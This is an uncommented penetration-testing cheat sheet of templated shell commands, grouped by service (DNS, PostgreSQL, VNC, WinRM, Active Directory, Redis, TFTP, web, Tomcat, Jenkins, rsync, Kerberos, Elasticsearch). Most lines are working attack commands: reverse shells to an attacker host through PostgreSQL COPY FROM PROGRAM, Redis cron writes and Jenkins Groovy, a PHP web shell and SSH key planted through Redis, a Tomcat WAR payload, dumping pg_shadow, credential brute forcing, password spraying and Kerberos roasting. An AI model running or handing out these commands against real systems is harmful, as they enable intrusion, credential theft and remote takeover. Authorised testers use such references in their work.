@{{RHOST}} dig ns {{DOMAIN}} @{{RHOST}} +short dig -x {{RHOST}} @{{RHOST}} host -l {{DOMAIN}} {{RHOST}} dnsrecon -d {{DOMAIN}} -n {{RHOST}} -t axfr dnsrecon -d {{DOMAIN}} -n {{RHOST}} -D {{WORDLIST}} -t brt dnsenum --dnsserver {{RHOST}} --enum -f {{WORDLIST}} {{DOMAIN}} gobuster dns -d {{DOMAIN}} -r {{RHOST}} -w {{WORDLIST}} nslookup -type=txt {{DOMAIN}} {{RHOST}} nmap -sV -p {{RPORT}} --script=pgsql-brute {{RHOST}} psql -h {{RHOST}} -p {{RPORT}} -U {{USER}} -W PGPASSWORD='{{PASS}}' psql -h {{RHOST}} -p {{RPORT}} -U postgres -c '\l' hydra -L {{WORDLIST}} -P {{WORDLIST}} {{RHOST}} postgres PGPASSWORD='{{PASS}}' psql -h {{RHOST}} -U {{USER}} -c 'SELECT usename, passwd FROM pg_shadow;' PGPASSWORD='{{PASS}}' psql -h {{RHOST}} -U {{USER}} -c "CREATE TABLE cmd(out text); COPY cmd FROM PROGRAM 'id'; SELECT * FROM cmd;" PGPASSWORD='{{PASS}}' psql -h {{RHOST}} -U {{USER}} -c "COPY cmd FROM PROGRAM 'bash -c \"bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1\"';" PGPASSWORD='{{PASS}}' psql -h {{RHOST}} -U {{USER}} -c "CREATE TABLE f(d text); COPY f FROM '/etc/passwd'; SELECT * FROM f;" nmap -p 5900 -sV -sC {{RHOST}} nmap -p 5900 --script vnc-info,vnc-title,realvnc-auth-bypass {{RHOST}} vncviewer {{RHOST}}::{{RPORT}} vncviewer -passwd vnc.pass {{RHOST}}::{{RPORT}} hydra -P {{WORDLIST}} -t 4 vnc://{{RHOST}}:{{RPORT}} vncpwd {{WORDLIST}} msfconsole -q -x 'use auxiliary/scanner/vnc/vnc_none_auth; set RHOSTS {{RHOSTS}}; run; exit' msfconsole -q -x 'use auxiliary/scanner/vnc/vnc_login; set RHOSTS {{RHOSTS}}; set PASS_FILE {{WORDLIST}}; run; exit' nmap -p5985,5986 -sV {{RHOST}} -oN winrm_enum.txt netexec winrm {{RHOST}} -u {{USER}} -p {{PASS}} netexec winrm {{RHOST}} -u {{USER}} -H {{NTHASH}} netexec winrm {{RHOST}} -u {{WORDLIST}} -p {{PASS}} --continue-on-success evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} evil-winrm -i {{RHOST}} -u {{USER}} -H {{NTHASH}} evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} -S evil-winrm -i {{RHOST}} -c cert.pem -k priv.key -S -u {{USER}} evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} -s /opt/scripts/ -e /opt/exes/ upload /home/kali/winPEASx64.exe C:\\Users\\Public\\winpeas.exe impacket-getTGT {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} && KRB5CCNAME={{USER}}.ccache evil-winrm -i {{DC_HOST}} -u {{USER}} -r {{DOMAIN}} LDAPTLS_REQCERT=never ldapsearch -x -H ldaps://{{DC_IP}}:636 -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 'DC={{DOMAIN}}' '(objectClass=user)' sAMAccountName nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' --port 636 --users impacket-rbcd -delegate-from 'ATTACKER$' -delegate-to 'TARGET$' -action write -dc-ip {{DC_IP}} '{{DOMAIN}}/{{USER}}:{{PASS}}' certipy shadow auto -u '{{USER}}@{{DOMAIN}}' -p '{{PASS}}' -account 'TARGET' -dc-ip {{DC_IP}} bloodhound-python -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' -ns {{DC_IP}} --use-ldaps -c All --zip openssl s_client -connect {{DC_IP}}:636 -showcerts </dev/null 2>/dev/null | openssl x509 -noout -subject -issuer -dates nmap -sV -p {{RPORT}} --script=redis-info {{RHOST}} redis-cli -h {{RHOST}} -p {{RPORT}} INFO redis-cli -h {{RHOST}} -p {{RPORT}} -a '{{PASS}}' INFO redis-cli -h {{RHOST}} -p {{RPORT}} CONFIG GET dir redis-cli -h {{RHOST}} -p {{RPORT}} CONFIG SET dir /var/www/html && redis-cli -h {{RHOST}} -p {{RPORT}} CONFIG SET dbfilename shell.php && redis-cli -h {{RHOST}} -p {{RPORT}} SET x '<?php system($_GET["c"]); ?>' && redis-cli -h {{RHOST}} -p {{RPORT}} SAVE (echo -e '\n\n'; cat {{LHOST}}_key.pub; echo -e '\n\n') > sshkey.txt && redis-cli -h {{RHOST}} -p {{RPORT}} flushall && cat sshkey.txt | redis-cli -h {{RHOST}} -p {{RPORT}} -x set sshkey && redis-cli -h {{RHOST}} -p {{RPORT}} config set dir /root/.ssh && redis-cli -h {{RHOST}} -p {{RPORT}} config set dbfilename authorized_keys && redis-cli -h {{RHOST}} -p {{RPORT}} save redis-cli -h {{RHOST}} -p {{RPORT}} MODULE LOAD /path/to/exp.so && redis-cli -h {{RHOST}} -p {{RPORT}} system.exec 'id' redis-cli -h {{RHOST}} -p {{RPORT}} CONFIG SET dir /var/spool/cron && redis-cli -h {{RHOST}} -p {{RPORT}} CONFIG SET dbfilename root && redis-cli -h {{RHOST}} -p {{RPORT}} SET x '\n* * * * * bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1\n' && redis-cli -h {{RHOST}} -p {{RPORT}} SAVE nmap -sU -p69 -sV {{RHOST}} nmap -sU -p69 --script tftp-enum {{RHOST}} tftp {{RHOST}} tftp {{RHOST}} -c get {{URL}} tftp {{RHOST}} -c put shell.php nmap -sV -p 80,443 --script=http-enum,http-title,http-headers,http-methods {{RHOST}} whatweb -a 3 {{URL}} nikto -h {{URL}} curl -s {{URL}}/robots.txt; curl -s {{URL}}/sitemap.xml feroxbuster -u {{URL}} -w {{WORDLIST}} -x php,txt,html -t 50 ffuf -u {{URL}} -H 'Host: FUZZ.{{DOMAIN}}' -w {{WORDLIST}} -fc 404 openssl s_client -connect {{RHOST}}:{{RPORT}} 2>/dev/null | openssl x509 -noout -text | grep -E 'Subject:|DNS:' wpscan --url {{URL}} --enumerate u,vp,vt --api-token <token> wpscan --url {{URL}} --usernames {{USER}} --passwords {{WORDLIST}} curl -s '{{URL}}/index.php?page=php://filter/convert.base64-encode/resource=index' nmap -sV -p 8080 --script=http-title,http-headers,http-enum {{RHOST}} whatweb {{URL}} feroxbuster -u {{URL}} -w {{WORDLIST}} -t 50 curl -s -u {{USER}}:{{PASS}} {{URL}}/manager/html hydra -L {{WORDLIST}} -P {{WORDLIST}} -f {{RHOST}} -s {{RPORT}} http-get /manager/html msfvenom -p java/jsp_shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f war -o shell.war curl -s -u {{USER}}:{{PASS}} -T shell.war '{{URL}}/manager/text/deploy?path=/shell' curl -s {{URL}}/script curl -s -d 'script=def proc=["/bin/bash","-c","bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1"].execute();proc.waitFor()' {{URL}}/scriptText nmap -p873 -sV --script rsync-list-modules {{RHOST}} rsync -av --list-only rsync://{{RHOST}}/ rsync -av --list-only rsync://{{RHOST}}/share_name rsync -av rsync://{{RHOST}}/share_name ./loot rsync -av ./payload rsync://{{RHOST}}/share_name/ rsync -av --port=873 'rsync://{{USER}}@{{RHOST}}/share_name' kerbrute userenum --dc {{DC_IP}} -d {{DOMAIN}} {{WORDLIST}} kerbrute passwordspray --dc {{DC_IP}} -d {{DOMAIN}} {{WORDLIST}} '{{PASS}}' nxc smb {{DC_IP}} -u {{WORDLIST}} -p '{{PASS}}' --no-bruteforce --continue-on-success impacket-GetNPUsers {{DOMAIN}}/ -dc-ip {{DC_IP}} -usersfile {{WORDLIST}} -no-pass -format hashcat -outputfile asrep.hashes impacket-GetNPUsers {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} -request -format hashcat -outputfile asrep.hashes impacket-GetUserSPNs {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} -request -outputfile kerb.hashes nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}} --kerberoasting kerb.out nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' --asreproast asrep.out Rubeus.exe kerberoast /outfile:kerb.hashes /nowrap Rubeus.exe asreproast /format:hashcat /outfile:asrep.hashes /nowrap sudo ntpdate {{DC_IP}} sudo timedatectl set-ntp off; sudo rdate -n {{DC_IP}} nmap -sV -p {{RPORT}} --script=http-elasticsearch-head {{RHOST}} curl -s http://{{RHOST}}:{{RPORT}}/ curl -s 'http://{{RHOST}}:{{RPORT}}/_cat/indices?v' curl -s 'http://{{RHOST}}:{{RPORT}}/INDEXNAME/_search?pretty&size=1000' curl -s -u {{USER}}:{{PASS}} 'http://{{RHOST}}:{{RPORT}}/_cat/indices?v' curl -s 'http://{{RHOST}}:{{RPORT}}/_search?pretty' -H 'Content-Type: application/json' -d '{"size":1,"script_fields":{"x":{"script":{"lang":"groovy","inline":"java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}}'